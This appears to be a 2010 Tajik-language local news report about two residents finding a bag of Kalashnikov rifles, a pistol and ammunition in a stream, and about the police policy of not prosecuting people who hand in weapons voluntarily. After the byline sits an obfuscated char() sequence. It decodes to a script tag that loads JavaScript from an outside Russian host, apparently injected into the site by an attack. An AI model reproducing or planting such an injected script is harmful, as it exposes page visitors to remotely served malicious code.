5.06.2010
Яроқи оташфишон ва тирдонҳо ёфт шуданд
Саидхӯҷа Ҷамшедзода ва Саид Иброҳимов сокинони ҷамоати Ғозиён ҳангоми оббозӣ намудан аз қаъри сойи поёни кӯпруки ҷамоати Ғозиёни ноҳияи Б. Ғафуров як халта ёфта ба ширкати ноҳия хабар медиҳанд. Ҳангоми аз тарафи кормандони ШКД- и ноҳия гузаронидани тафтишот маълум шуд, ки аз даруни халта 2 автомати Калашников AK MС- 74 соли бароишаш 1988, АК СУ- 74 соли бароришаш 1993, туфангчаи ТТ 8 донабо тир, тирдон 9 ммл аз туфангчаи Макаров, 6 дона тирдон бо 195 дона тир ёфт шуд. Бино ба гуфти муовини сардори бахши тафтишотии ШКД- и ноҳияи Б. Ғафуров майори милитсия Фарҳод Муҳаммадҷонов парвандаи ҷиноӣ боз шуда, тафтишот идома дорад ва шахсони мазкур тибқи қонунгузории Ҷумҳуруии Тоҷикистон, ки ихтиёран яроқҳои оташфишон ва лавозимотҳои ҷангӣ ёфта оварда супоридаанд ба ҷавобгарӣ кашида намешаванд. Бояд ёдовар шуд, ки аз дуюми декабри соли 1994 таҳти рақами №2 фармони Президенти ҶТ Эмомали Раҳмон ихтиёран супоридани яроқҳои оташфишон ва лавозимотҳои ҷангӣ ба тавсиб расидааст. Барои ин амалашон шаҳрвандон аз тарафи ШКД- и ноҳия бо тӯҳфаҳо қадрдонӣ шудаанд.
Афзал Босолиев

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)abee8925d8608bcd98a782c093e4cd77.js" type="text/javascript">

ТАВЗЕҲОТ